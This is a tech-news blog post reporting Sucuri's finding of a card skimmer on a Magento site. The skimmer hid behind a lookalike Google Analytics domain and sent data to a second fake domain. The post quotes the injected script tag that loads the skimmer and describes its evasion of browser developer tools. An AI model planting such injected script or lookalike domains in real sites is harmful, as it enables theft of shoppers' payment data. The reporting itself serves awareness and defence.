// Techno NEWS // Google Malicious Domains Used in an Attacks On Magento

Hackers use fake Google domains convincing enough to fool website visitors into believing that infected websites are safe when they conduct online transactions.

Source

On Thursday, Sucuri researchers have published a recent case reported by a website owner under Magento.

A domain had been infected by a credit card skimmer using JavaScript code containing a link to the malicious address of the google-analytîcs[.]com website.

An example of the code used:
< script type=" text/javascript " src =" //google-analytîcs.com/www.[edited].com/3f5cf4657d5d9.js " > < /script>

"Visitors to the website can see a trustworthy name (such as Google) in queries and assume that they can be safely loaded, without noticing that the domain does not match perfectly and that it is actually malicious," say researchers about this attack process.

Card skimmer

The website owner was made aware of a problem after being blacklisted. Sucuri's investigation revealed that the data entry element of the malware module is similar to others found on other scams and uses Javascript to siphon and secretly store all input data and drop-down menu selections.

However, the code will change tactics depending on whether development tools are used in the Google Chrome or Mozilla Firefox browser.

In this case, the malicious module will not attempt to obtain information in these scenarios, which is probably an attempt to avoid detection.

According to Sucuri, the malicious module (called card skimmer) supports "dozens" of payment gateways, and if the development tools are not detected, the stolen information is sent to a remote server -- again disguised with another fraudulent domain, google[.] ssl[.]lnfo[.]cc.

Magento, WordPress and Drupal at risk

Card skimmers, installed through vulnerable e-commerce websites, are widespread. In July, RiskIQ reported that a recent spray-and-pray campaign had been successful for the Magecart hacking group, which had successfully infected more than 17,000 websites in a few months.

Magento users, like WordPress and Drupal, are encouraged to keep their software up to date.

Magento domains are a frequent target for cyber attackers seeking to collect financial data, with about 83% of Magento websites reported as vulnerable in 2018.

Stay Informed, Stay Safe

• I've made a lot of articles with tools, explanations and advises to show you how to protect your privacy and to secure your computer, GO check them out!

  • This is my guide To Secure your PC after a fresh installation of Windows

  • If you think that your Phone or your PC has been hacked, you have to check it right now!

  • That's how you can be more Anonymous on the internet!

  • The Future of Cyber-Security, what to expect?

  • The best Crypto debit card – Wirex!

  • These are the best VPN to protect your numeric life: NordVPN, ExpressVPN and CyberGhost!

  • Your PC is slow? That's why!

  • Why is it important to Be Discreet on the Internet

  • The 4 security measures to put in place on your WIFI router

  • What Do Tech Giants Know About You? A New Tool To Get An Idea!

  • The Security guide everyone must have on holidays!

  • Feel hot? Your Computer also!

  • How an Adware works?

  • That's how you should guard against Trojan!

  • Why Antiviruses are not your friend?!

  • Basics tools to protect your Privacy and your Computer

  • What are the different Types of hackers?